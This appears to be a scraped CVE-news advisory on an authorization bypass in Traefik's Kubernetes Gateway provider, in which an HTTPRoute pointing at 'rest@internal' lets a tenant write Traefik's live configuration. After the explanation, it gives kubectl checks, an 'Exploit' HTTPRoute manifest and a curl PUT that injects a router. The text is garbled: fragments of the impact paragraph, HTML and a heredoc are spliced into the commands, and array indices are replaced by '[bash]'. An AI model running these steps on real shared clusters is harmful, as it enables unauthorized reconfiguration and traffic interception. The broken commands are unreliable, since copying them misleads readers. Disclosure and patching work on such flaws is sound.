Listen to this Post
How the vulnerability works:
The Traefik Kubernetes Gateway API provider incorrectly handles backend references whose names end with “@internal”. The function isInternalService() in pkg/provider/kubernetes/gateway/kubernetes.go returns true for any TraefikService name with that suffix, not only the intended “api@internal”. Then pkg/provider/kubernetes/gateway/httproute.go special-cases the first backend reference matching isInternalService() and directly assigns router.Service = string(routeRule.BackendRefs[bash].Name). This allows an HTTPRoute to target “rest@internal” in addition to “api@internal”. Separately, when providers.rest is enabled, Traefik always creates the REST provider handler in pkg/server/service/managerfactory.go, regardless of the providers.rest.insecure flag. That flag only controls whether Traefik’s built-in internal router exposes rest@internal, but does not disable the underlying service handler. The REST handler in pkg/provider/rest/rest.go accepts PUT /api/providers/rest for dynamic configuration updates. Consequently, a tenant with HTTPRoute creation permissions can publish “rest@internal” as a backend, reach the REST API, and send a PUT request to modify Traefik’s live configuration. This bypasses the intended restriction of providers.rest.insecure=false. The vulnerable code exists in v2.11.0 through v2.11.36, v3.0.0 through v3.6.7, and current master. The issue is an authorization bypass in shared Gateway deployments where the REST provider is enabled.
dailycve form:
Platform: Traefik K8s Gateway
Version: v2.11.x, v3.0-3.6.7
Vulnerability: No public CVE
Severity: medium
date: Not specified
Prediction: Already patched (v2.11.46, v3.6.17, v3.7.1)
What Undercode Say:
Check Traefik version
kubectl get deployment traefik -o jsonpath='{.spec.template.spec.containers[bash].image}’
Verify if REST provider is enabled
kubectl get configmap traefik-config -o yaml | grep -A2 “rest:”
Test for vulnerability: attempt to create HTTPRoute with rest@internal
<
h2 style=”color: blue;”>cat < curl -X PUT http://rest.tenant.example/api/providers/rest \ Low-privileged tenant with HTTPRoute create/update permissions gains live dynamic configuration write access to Traefik. This allows unauthorized creation/modification of routers and services, request interception/rerouting, exposure of other internal handlers, and denial of service via destructive config changes. Critical for shared Gateway deployments where REST provider is enabled. Reported By: github.comapiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
name: test-rest-internal
spec:
parentRefs:
rules:
kind: TraefikService
name: rest@internal
EOF
Check if route is accepted
kubectl get httproute test-rest-internal -o yaml
Exploit:
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
name: expose-rest
spec:
parentRefs:
namespace: infra
hostnames:
rules:
kind: TraefikService
name: rest@internal
2. Send PUT request via the exposed route:
-H “Content-Type: application/json” \
-d ‘{“http”:{“routers”:{“probe”:{“rule”:”PathPrefix(/probe)”,”service”:”noop@internal”}}}}’Protection from this CVE:
Impact:
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Extra Source Hub:
Undercode🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow DailyCVE & Stay Tuned:

